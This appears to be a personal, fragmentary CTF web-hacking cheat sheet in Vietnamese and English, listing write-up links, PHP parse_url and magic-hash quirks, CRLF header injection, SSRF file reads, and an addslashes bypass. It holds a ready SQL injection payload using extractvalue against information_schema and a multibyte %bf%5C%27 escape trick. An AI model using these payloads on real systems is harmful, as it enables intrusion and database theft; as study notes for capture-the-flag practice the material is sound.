https://vinasupport.com/fix-loi-this-site-cant-provide-a-secure-connection/

github.dev
không cần phải hiểu code chạy như nào 
xem input với output rồi đoán quy luật

tra vulneribility từ những thư viện được import nhưng không dùng
#------------------------------------url
<?php
// single slash case
$uri = "/upload?/home/binarycloud/";
$data = parse_url($uri);
print_r($data);

// doubleslash case
$uri = "//upload?/home/binarycloud/";
$data = parse_url($uri);
print_r($data);
?>
no space in url --> bypass <url>#<space>
https://hackmd.io/@onsra03/SkiBeaed3 
302 to redirect and get info
file:///proc/mounts

https://hackmd.io/@endy/r1AHaERDo
hàm require trong nodejs chỉ require 1 file dc 1 lần, require lần 2 k có tác dụng

https://nhattruong.blog/2022/10/27/mot-so-payload-khi-test-truong-email/  --test email

tạo ra vòng lặp vô hạn bằng cách thay đổi para từ url từ string -> obj
test?guess[length]=9999999999999999999 
\r\n to add header
admın
Turkish character

Đẩy code lên mà chưa thao tác gì => lỗi nằm ở server: service, code, ...
sau khi set up operate => lỗi nằm ở operate

file không mở được => sai file extension, sai file signature

https://viblo.asia/p/ky-thuat-post-exploitation-trong-red-team-p1-linux-Ny0VGjXYLPA
-----dangerous func
---php
extract() 
https://nhattruong.blog/2022/12/01/write-up-kcsc-ctf-web/    240610708 QNKCDZO
sha256 34250003024812
preg_replace()    php 5.5<=

---------------------------addsplashs bypass
`....` "   run code in "   4 in 1 Cyberjutsu
pass=%1$') UNION select 1,extractvalue(0x0a, concat(0x0a, (SELECT group_concat(column_name) FROM information_schema.columns WHERE
table_name=0x746f74616c6c795f6e6f745f615f666c6167 ))) -- -#
https://laxiisteam.blogspot.com/2023/04/sqli-lam-nao-e-bypass-ham-addslashes.html
%bf%5C%27 union select ...
0xbf5c27
--------------------------bypass preg_match(): compare
https://nguyendt.hashnode.dev/webhackingkr